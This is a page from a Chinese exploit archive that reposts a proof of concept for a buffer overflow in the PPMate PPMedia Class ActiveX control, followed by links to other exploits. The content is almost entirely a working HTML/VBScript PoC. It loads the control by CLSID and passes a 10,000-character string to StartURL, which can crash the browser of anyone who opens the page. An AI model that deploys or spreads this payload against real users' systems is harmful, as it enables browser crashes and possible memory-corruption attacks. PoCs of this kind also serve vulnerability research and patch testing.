手机
当前位置:查字典教程网 >网络安全 >Exploit >PPMate PPMedia Class ActiveX Control Buffer Overflow PoC
PPMate PPMedia Class ActiveX Control Buffer Overflow PoC
摘要:arg1=String(10000,"A")target.StartURL(arg1)

<html>

<body> <object id=target

classid=clsid:72B15B25-2EC8-4CDD-B284-C89A5F8E8D5F></object>

<script language=vbscript> arg1=String(10000, "A")

target.StartURL(arg1) </script>

</body>

</html>

【PPMate PPMedia Class ActiveX Control Buffer Overflow PoC】相关文章:

BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit

BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service

FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit

phsBlog 0.2 Bypass SQL Injection Filtering Exploit

Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC

WarFTP 1.65 (USER) Remote Buffer Overlow Exploit

Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BOF Exploit

Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow Exploit (c)

Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit

Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

精品推荐
分类导航